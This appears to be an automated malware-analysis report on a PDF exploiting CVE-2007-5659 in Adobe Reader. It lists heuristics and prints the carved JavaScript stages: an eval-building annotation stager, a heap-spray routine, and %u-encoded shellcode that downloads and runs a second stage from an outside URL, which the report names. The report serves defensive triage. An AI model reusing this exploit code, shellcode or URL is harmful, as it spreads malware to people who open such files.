Malicious PDF — malware analysis report

Static analysis result for SHA-256 13353e0c08562b95…

MALICIOUS

PDF

16.5 KB
MD5: 4003712fa1384c415710597aa7158e09 SHA-1: 88a4336fb9660caf53605c0bc366d19e4003f104 SHA-256: 13353e0c08562b954e6bad6a8b23f7ef7f66a2c22493f601409d7073daa47243
406 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

This PDF file contains obfuscated JavaScript that exploits CVE-2007-5659, targeting specific versions of Adobe Reader. The script is designed to download a second-stage payload from the URL http://about-bear.com/info/sun.html/n002106201r0409Xf812e654Y1c4c7f14. The presence of multiple JavaScript exploit heuristics and a high ML classifier score indicate a malicious intent to execute arbitrary code.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 11

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action low 5 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) high CVE likely PDF_JS_ADOBE_APSB08_13_PATCH_GATE
    PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Obfuscated multi-stage PDF JavaScript dropper high PDF_JS_OBFUSCATED_DROPPER
    PDF JavaScript shows 4 independent signals of exploit-kit-style multi-stage obfuscation: annot_subject_stage, hex_codec_loop, incremental_eval_build, repeated_pluginschk. This is strongly consistent with pre-2011 Adobe Reader PDF droppers — OpenAction JS reads encoded data from annotation subjects, decodes it through one or more hex / base-N loops, and invokes eval indirectly (method name built one character at a time). The actual CVE is hidden in the final decoded layer and is not visible via static analysis.
  • PDF JavaScript shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • ClamAV: Pdf.Exploit.Agent-35901 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Exploit.Agent-35901
  • Annotation subject callee-key hex JavaScript stager high PDF_ANNOT_SUBJECT_CALLEE_HEX_STAGER
    PDF JavaScript uses syncAnnotScan()/getAnnots() to read an indirect annotation /Subject stream, percent-decodes it through marker replacement, then uses a callee.toString()-derived key to decode and eval the final exploit stage.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://about-bear.com/info/sun.html/n002106201r0409Xf812e654Y1c4c7f14 Referenced by PDF JavaScript

Extracted artifacts 4

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0009_000.js
4718a27c2224fc36bf24f8e8e04598f1ad78adce4401c7be2708318738a6983d		 pdf-javascript-stream PDF /JS object 9 at offset 0x3F66 469 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var pr = null;
var fnc = 'ev';
var sum = '';

app.doc.syncAnnotScan();

if (app.plugIns.length != 0) {
	var num = 1;

	pr = app.doc.getAnnots(
		{
			nPage: 0
		}
	);

	sum = pr[num].subject;
}

var buf = "";

if (app.plugIns.length > 3) {
	fnc += 'a';
	var arr = sum.split(/-/);

	
	for (var i = 1; i < arr.length; i++) {
		buf += String.fromCharCode("0x"+arr[i]);
	}
	fnc += 'l';
}

if (app.plugIns.length >= 2)
{
	app[fnc]/**/(buf);
}
annotation_subject_callee_hex_stage_000.js
4ce00b5b3bd3efd0813b43cde33b52e6d9110cb7cc4ed7026c70576b7c6183ba		 deobfuscated-js annotation-subject callee-key decoded JavaScript at offset 0x19B2 5110 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var f4_2k0xMk5J_27 = new Array();var e7B___8p = 0;var Qt_7eIm = "";function B_48_E4kGS_qq(U_K__AP7, s4_S5Q){var OY_P7i51s_35U = s4_S5Q.toString();var yM073o6Qpq = "";for(var h1jPh_8j0 = 0; h1jPh_8j0 < OY_P7i51s_35U.length; h1jPh_8j0++) {var gYW_U2q3_r___QG = parseInt(OY_P7i51s_35U.substr(h1jPh_8j0, 1));if (!isNaN(gYW_U2q3_r___QG)) {gYW_U2q3_r___QG = gYW_U2q3_r___QG.toString(16);if (gYW_U2q3_r___QG.length == 1) { gYW_U2q3_r___QG = "0" + gYW_U2q3_r___QG; }else if (gYW_U2q3_r___QG.length != 2) { gYW_U2q3_r___QG = "00"; }yM073o6Qpq = gYW_U2q3_r___QG + yM073o6Qpq;if (yM073o6Qpq.length == 8) {break;}}}while(yM073o6Qpq.length < 8) { yM073o6Qpq = "0" + yM073o6Qpq; }var hQ7vR7w = U_K__AP7.toString(16);if (hQ7vR7w.length == 1) { hQ7vR7w = "0" + hQ7vR7w; }else if (hQ7vR7w.length != 2) { hQ7vR7w = "00"; }yM073o6Qpq = "3" + hQ7vR7w + "P" + yM073o6Qpq;return yM073o6Qpq;}function a_f____OHVP34_B(Vy0WVW____7_f, YjWi_A__jaA5i6F){var Y814__djqX6l5_l = new Array("");var L_RH48 = Vy0WVW____7_f;var j1FG1ps1B0346;if ((j1FG1ps1B0346 = Vy0WVW____7_f.lastIndexOf("%u00")) != -1) {if (j1FG1ps1B0346 + 6 == Vy0WVW____7_f.length) {Y814__djqX6l5_l[0] = Vy0WVW____7_f.substr(j1FG1ps1B0346 + 4, 2);L_RH48 = Vy0WVW____7_f.substring(0, j1FG1ps1B0346);}}j1FG1ps1B0346 = 1;for (h1jPh_8j0 = 0; h1jPh_8j0 < YjWi_A__jaA5i6F.length; h1jPh_8j0++) {var f_3e_7N_o = YjWi_A__jaA5i6F.charCodeAt(h1jPh_8j0).toString(16);if (f_3e_7N_o.length == 1) { f_3e_7N_o = "0" + f_3e_7N_o; }Y814__djqX6l5_l[j1FG1ps1B0346] = f_3e_7N_o;j1FG1ps1B0346++;}h1jPh_8j0 = Y814__djqX6l5_l[0].length ? 0 : 1;Y814__djqX6l5_l[j1FG1ps1B0346] = "00";Y814__djqX6l5_l[j1FG1ps1B0346 + 1] = "00";j1FG1ps1B0346 += 2;if ((Y814__djqX6l5_l.length - h1jPh_8j0) % 2) {Y814__djqX6l5_l[j1FG1ps1B0346] = "00";}while(h1jPh_8j0 < Y814__djqX6l5_l.length) {L_RH48 += "%u" + Y814__djqX6l5_l[h1jPh_8j0 + 1] + Y814__djqX6l5_l[h1jPh_8j0];h1jPh_8j0 += 2;}L_RH48 += "%u0000";return L_RH48;}function P_EI6h_Hd(my0Scd3, tRU818v){while (my0Scd3.length*2<tRU818v) {my0Scd3 += my0Scd3;}my0Scd3 = my0Scd3.substring(0,tRU818v/2);return my0Scd3;}function tD_6Q7v(UlFc_5, El_OJ14_T, VRrTtb){var eC__4362_1w5nBK = 0x0c0c0c0c;var my0Scd3 = unescape(El_OJ14_T);var YjWi_A__jaA5i6F = B_48_E4kGS_qq(UlFc_5, VRrTtb);var Ov__VA0X7tu = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050%u6a51%u33ff%u64db%u2389%u026a%u8b59%uf3fb%u75af%uff07%u66e7%ucb81%u0fff%ueb43%ue8ed%uffda%uffff%u0c6a%u8b59%u0c04%ub8b1%u0483%u0608%u8358%u10c4%u3350%uc3c0");var Vy0WVW____7_f = "%u9050%u9050%u9050%u9050" + "%u9090%u9090%u9090%u9090%ufbe9%u0000%u5f00%ua164%u0030%u0000%u408b%u8b0c%u1c70%u8bad%u2068%u7d80%u330c%u0374%ueb96%u8bf3%u0868%uf78b%u046a%ue859%u008f%u0000%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u8b16%ue8e8%u0079%u0000%ud78b%u8047%u003f%ufa75%u5747%u8047%u003f%ufa75%uef8b%u335f%u81c9%u04ec%u0001%u8b00%u51dc%u5352%u0468%u0001%uff00%u0c56%u595a%u5251%u028b%u4353%u3b80%u7500%u81fa%ufc7b%u652e%u6578%u0375%ueb83%u8908%uc703%u0443%u652e%u6578%u43c6%u0008%u8a5b%u04c1%u8830%u0045%uc033%u5050%u5753%uff50%u1056%uf883%u7500%u6a06%u5301%u56ff%u5a04%u8359%u04c2%u8041%u003a%ub475%u56ff%u5108%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be%uf238%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359%u00e8%uffff%u8eff%u0e4e%u98ec%u8afe%u7e0e%ue2d8%u3373%u8aca%u365b%u2f1a%u5370%u594f%u0058%u7468%u7074%u2f3a%u612f%u6f62%u7475%u622d%u6165%u2e72%u6f63%u2f6d%u6e69%u6f66%u732f%u6e75%u682e%u6d74%u2f6c%u306e%u3230%u3031%u3236%u3130%u3072%u3034%u5839%u3866%u3231%u3665%u3435%u3159%u3463%u3763%u3166%u0034";app.D__7__64c = unescape(a_f____OHVP34_B(Vy0WVW____7_f, YjWi_A__jaA5i6F));var f6__B4Q = 0x400000;var u_Ig1_srQRgn = Ov__VA0X7tu.length * 2;var tRU818v = f6__B4Q - (u_Ig1_srQRgn+0x38);my0Scd3 = P_EI6h_Hd(my0Scd3, tRU818v);var b5eNh__2_5__8WW = (eC__4362_1w5nBK - 0x400000)/f6__B4Q;for (var Yk__SS = 0; Yk__SS < b5eNh__2_5__8WW; Yk__SS++) {f4_2k0xMk5J_27[Yk__SS] = my0Scd3 + Ov__VA0X7tu;}}function C_708C2y_n5nU(){var HUkh66 = "";for (h1jPh_8j0 = 0; h1jPh_8j0 < 12; h1jPh_8j0++) {HUkh66 += unescape("%u0
... (truncated)
legacy_pdfkit_stage_000.js
d3c0006f5e074816203d1c492231c899cc3b4fc96469ba9d48f00478218523bc		 deobfuscated-js repeated-marker hex decoded JavaScript at offset 0x1A06 11463 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function l_CndC_1_w__Qe(X0ign_P57_g3IEO, h_2_cc_y5_Jb){var Lf_1fhg_035Np = new Array();var d4gBDn78TF0 = 512;var t_Sb6qcek = 21;var OTDi0N7bjt15 = 0;var mh_BecAWq = 0;var HA0Y2Fg_GU_e = 0;var G40_W7gP_Hf2 = "";var tjJ2P_HED = "";var LQ___v = 6;try {var t0tW75yxyK0 = 0;if (app) {HA0Y2Fg_GU_e = HA0Y2Fg_GU_e + 2;h_2_cc_y5_Jb = pr[t0tW75yxyK0].subject;}} catch(e) { }HA0Y2Fg_GU_e = HA0Y2Fg_GU_e + 5;if (!X0ign_P57_g3IEO) { Lf_1fhg_035Np = new Array(197,110,246,53,82,76);} else {Lf_1fhg_035Np = X0ign_P57_g3IEO;}var Owr5I8y2a_1_x = 0;var Ctc0e3 = 0;var wif_N_6__3Y7 = 0;while(Ctc0e3 < h_2_cc_y5_Jb.length) {var Ogq_k1Fc04 = h_2_cc_y5_Jb.substr(Ctc0e3, 2);var J__KIiu = parseInt(Ogq_k1Fc04, 21);if (Owr5I8y2a_1_x >= LQ___v) {Owr5I8y2a_1_x = 0;}J__KIiu -= Lf_1fhg_035Np[Owr5I8y2a_1_x] * (wif_N_6__3Y7 + 2);var wn__Tq_h = Math;if (J__KIiu < 0) {J__KIiu -= wn__Tq_h.floor(J__KIiu / 256) * (d4gBDn78TF0 / 2);}if (Ctc0e3 >= 0) {J__KIiu = String.fromCharCode(J__KIiu);}if (HA0Y2Fg_GU_e == 6) {G40_W7gP_Hf2 += C35F6ex8_b;} else if (HA0Y2Fg_GU_e == 7) {G40_W7gP_Hf2 += J__KIiu;} else {G40_W7gP_Hf2 += Ctc0e3;}Owr5I8y2a_1_x++;Ctc0e3 += 2;wif_N_6__3Y7++;}var R2_fU_w604028 = this;R2_fU_w604028['ev'+'al'](G40_W7gP_Hf2);}
	l_CndC_1_w__Qe(0, "00833b1k3j39690g075e3h1k277k82aibfa96634352710ah1da9465ac1859b43b08db2554a1i7k92a11e2h6g7ha97a84821g5546915b50bb16557a4h1e28907237066h0c8h1c5a1b47815d0h2ka19706215b177k5c8db8ac36221c417c0a1a0d8i9435091a9b4j580h5f94a5170j0i67a15k7g73780c7i18412f471189a2906g4b3k7k9i3k3kac9k7g742608ab09692a654h862g60bd580b223f210b9f7g2699047e40087j9h2c78357f9128240ka6305d4b0g16370c00549k7haa588cbc898e77288f01a43508772i42892ha41k3a5h5c12658ha7a64aa61i6a9i2b665662114950444g495h46541ab898bf25ba32c2469k9k0g21810a565642205ia3ba3i5j971c2a731gaj030hbk1jc0a79e9g877b65447a544d32344e8128c3b42cac8c2k3j599c0j5jc01ia49912355j74473a4c546c1fb7059f4f2g03809j082b0b7c347b3hbka93haf6h5j056d7i300ka4074h58090d9ec1071288a92ca5b67abb5k2b9e903c984567944bba531ib978365e8k002k5i26316d915b2i8d7fad3g8c4i53288927ae3c50a83g9i1h3b2h7i9k893dbb0g3a5b6d8f136e92a5088a9840783f0j13ad470jbdaf26a12c8j8d706e7k842d0a1581555b967b1e0g6h5i6d35ba1j654229057g6643b06k8f54ab56a7262d289i0g7g078hb833065c6141996c1a212h9k37a30h02b86k359a8h7637ai9c05c335217c8j649819a10d69a18j0j4b92299267799328aec3564g8h0f943c43303a4c6b9c5kbd8dac4fb93gbk5266270834a40j36ah4g123d5k77947bb5211e5k33ae13239c0b2cb68kc15g4i9e2kb864162g9c5ea65ga4986ib85f14340i13b74g1a06bh094g787k9274aj8g667a3d0j40bh41228d5c4bbc362a6f041b4c3fbc24a0755cb56e63198f7427501h9c291fa82b0474ai26889h4eaa804879b61860657fa559923j63b15b6364a5370b8018af62b34c7g8c679189994f8j365a57aa2875bc14444145466b64a74305b81k406e69269g72bh64a221594k5i4e330k5b8ib0be2f90c1448h79929ca13d1f5e0c667e716a2abe5743284e14398a37b0059a567i1c8i728d855kb30cac5j172d95aa633g2d445g73360g87bhc1036k6k86ai1a66555cbj1h912f0h082k8k429j4a9h5h805g8f0f7d8c7k290i7k7h22629c770c211653612eak0d558655b66b7d7d35067h9b4gac261g3051301f5282af2k2j51467e7fa502a9bd5k141h6dac25028jbj6b1f1kbj5k6e3078019e0ka00197b3657g7i96bb8g33280d48317baaa4b0175d7ba15k4d0f8k527g1d9571bd6c4f966b5g2e522k45c3276224ag929g2c8e42666f198d9a256d2cai8h1kbb4c7i545f25ajaa5j073854a3bf19740d8b7f555a059h20ac2a2a90553g6e0k7j25007890a25iaabkag6h9e1c3i9a1i4382941b3d502f33365a4c881g069f09b18916be7d6c7daf2c671936544j213e8g952950a8043i3715b59303080hb00ga9a169858a18a27a4d4245788g5004982g704eba7c2g9b9e4190b1927607366f6h3j786g5135222610812d180i9ga7ah0cb05b1f6e0ab18ac292542j0a9084543b8ac3525g09b8bhbb021f7gb32kb50461bb8j5579721j984f8f8i7ab3262a99784c6d91b2b84haa1f78624g51a99e105a822d83575f3cc23f69173h9727091d6f7g9j5fbeak0k2f445g9j747f9h0k7e9h49475h0b0h9j26bfag85189d2j6e856c6k92b4453a25a68a640bbc1920846g7c62b018400gbd0g5c5g43abag852f8b227k3504beb34h8h1370a42a055b921i7347bc001b82416bab9ib76f3f9a93974317b93eah48245d664c6i177abj6i6k99044k9g1f095f79a81d09386d8578a5a15h6c54164b7e6h3j02ai1e51c253043i591j063f8c17368k5k00435k7g4k9f28414e2459b7a91cb6a71922037h5042b65ca58d1k0b8f80a45c817067907b0a5046322d690j08b4aj5e44a25a668g815i533bac41855j529k8e4e1h4e213507b31f16be1b6c7d7c216990495a98126d1fc24h1e0b44c037012688ab47a8033iaga1038b837j8e78ab023e9g5d2
... (truncated)
deobfuscated.js
4a28a3142cde12a576b6bfcb8d24a850cba6948f17e2a4a4408a4639e96dc6eb		 deobfuscated-js PDF JavaScript deobfuscation pass 90927 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 10 eval/decoder/string-building token(s). Carved artifact contains 3 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
00833b1k3j39690g075e3h1k277k82aibfa96634352710ah1da9465ac1859b43b08db2554a1i7k92a11e2h6g7ha97a84821g5546915b50bb16557a4h1e28907237066h0c8h1c5a1b47815d0h2ka19706215b177k5c8db8ac36221c417c0a1a0d8i9435091a9b4j580h5f94a5170j0i67a15k7g73780c7i18412f471189a2906g4b3k7k9i3k3kac9k7g742608ab09692a654h862g60bd580b223f210b9f7g2699047e40087j9h2c78357f9128240ka6305d4b0g16370c00549k7haa588cbc898e77288f01a43508772i42892ha41k3a5h5c12658ha7a64aa61i6a9i2b665662114950444g495h46541ab898bf25ba32c2469k9k0g21810a565642205ia3ba3i5j971c2a731gaj030hbk1jc0a79e9g877b65447a544d32344e8128c3b42cac8c2k3j599c0j5jc01ia49912355j74473a4c546c1fb7059f4f2g03809j082b0b7c347b3hbka93haf6h5j056d7i300ka4074h58090d9ec1071288a92ca5b67abb5k2b9e903c984567944bba531ib978365e8k002k5i26316d915b2i8d7fad3g8c4i53288927ae3c50a83g9i1h3b2h7i9k893dbb0g3a5b6d8f136e92a5088a9840783f0j13ad470jbdaf26a12c8j8d706e7k842d0a1581555b967b1e0g6h5i6d35ba1j654229057g6643b06k8f54ab56a7262d289i0g7g078hb833065c6141996c1a212h9k37a30h02b86k359a8h7637ai9c05c335217c8j649819a10d69a18j0j4b92299267799328aec3564g8h0f943c43303a4c6b9c5kbd8dac4fb93gbk5266270834a40j36ah4g123d5k77947bb5211e5k33ae13239c0b2cb68kc15g4i9e2kb864162g9c5ea65ga4986ib85f14340i13b74g1a06bh094g787k9274aj8g667a3d0j40bh41228d5c4bbc362a6f041b4c3fbc24a0755cb56e63198f7427501h9c291fa82b0474ai26889h4eaa804879b61860657fa559923j63b15b6364a5370b8018af62b34c7g8c679189994f8j365a57aa2875bc14444145466b64a74305b81k406e69269g72bh64a221594k5i4e330k5b8ib0be2f90c1448h79929ca13d1f5e0c667e716a2abe5743284e14398a37b0059a567i1c8i728d855kb30cac5j172d95aa633g2d445g73360g87bhc1036k6k86ai1a66555cbj1h912f0h082k8k429j4a9h5h805g8f0f7d8c7k290i7k7h22629c770c211653612eak0d558655b66b7d7d35067h9b4gac261g3051301f5282af2k2j51467e7fa502a9bd5k141h6dac25028jbj6b1f1kbj5k6e3078019e0ka00197b3657g7i96bb8g33280d48317baaa4b0175d7ba15k4d0f8k527g1d9571bd6c4f966b5g2e522k45c3276224ag929g2c8e42666f198d9a256d2cai8h1kbb4c7i545f25ajaa5j073854a3bf19740d8b7f555a059h20ac2a2a90553g6e0k7j25007890a25iaabkag6h9e1c3i9a1i4382941b3d502f33365a4c881g069f09b18916be7d6c7daf2c671936544j213e8g952950a8043i3715b59303080hb00ga9a169858a18a27a4d4245788g5004982g704eba7c2g9b9e4190b1927607366f6h3j786g5135222610812d180i9ga7ah0cb05b1f6e0ab18ac292542j0a9084543b8ac3525g09b8bhbb021f7gb32kb50461bb8j5579721j984f8f8i7ab3262a99784c6d91b2b84haa1f78624g51a99e105a822d83575f3cc23f69173h9727091d6f7g9j5fbeak0k2f445g9j747f9h0k7e9h49475h0b0h9j26bfag85189d2j6e856c6k92b4453a25a68a640bbc1920846g7c62b018400gbd0g5c5g43abag852f8b227k3504beb34h8h1370a42a055b921i7347bc001b82416bab9ib76f3f9a93974317b93eah48245d664c6i177abj6i6k99044k9g1f095f79a81d09386d8578a5a15h6c54164b7e6h3j02ai1e51c253043i591j063f8c17368k5k00435k7g4k9f28414e2459b7a91cb6a71922037h5042b65ca58d1k0b8f80a45c817067907b0a5046322d690j08b4aj5e44a25a668g815i533bac41855j529k8e4e1h4e213507b31f16be1b6c7d7c216990495a98126d1fc24h1e0b44c037012688ab47a8033iaga1038b837j8e78ab023e9g5d2a2473c30b7j21ab56bg4c5hbc8fa75jai5871124i61044k6gbe19153g1g3c6g8d0i3j1dbkba4aad6i0a846j8e4ibja263175j3k0e05529kbh126a9a2k5066966ab10f070k579b75777c6j303h8g495j3b26575b4aae869c5663bd614287b55fb7490e3b2d2b83bf7i084i15626f3d038j31c0056k6i7ic29772325kbkaf7d4dbi3d520d6ea477af7bbd4380bc8e977i2a3g695db470938838132c535d3986ac596j40b037ada26a3f98c25h1a360b4a72591d338j942k304c20534d73996fc31fc13k5bb1aeb7778i2g1f11983f4h0d740b6fb1aga1768i35566566a3834139bj3h098db5897f3c6084ak6h46ak9c507g1j97ae006g5a9h6k4406222i1k1j3d6143a20064b25c09664i0f7h0e1k4g03867k261b4aaf4i335iab165hc12g60a89eab7j078k955j5kc26g1h6e3i08623d2d5h120350398688093db7a3b662a21c3ja0ba2i5762074g262i47497j46863dbj080b0jb00ebh7ca6ad232a5kbh5g6a420a4g829d1b4caf042c3c2f7288a5a00j93ag88a1878a8e4c935946125676875390ae1fa17c04712g8ga23d981g9169075871744i61664k6g5c19159i1g3c0e8d0ga03704803e7h3abha714b34d690484a93f4a6d932d439db3a2091b126i970b888k630f4c2d6ba71f732a65594j044b2i06864e3ha8b41c57b906499g5a6bbb9i205k8i5553468118a01d5j071h00b836415d989650bg9j045h5d75b17a8i0g0hc00j796b770had88502dbb964ca6bg6c9576819a004e0k208d937jb68eb6b88636426fb655402d2d0a5e3k2hb26k7k637e3ga55b010722418dac8dbc3i071f6b11947hb91a3eb73c741a09b36j3h14019d6fa89j0hbh5d14607247ak1671034fa1941j5cae
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.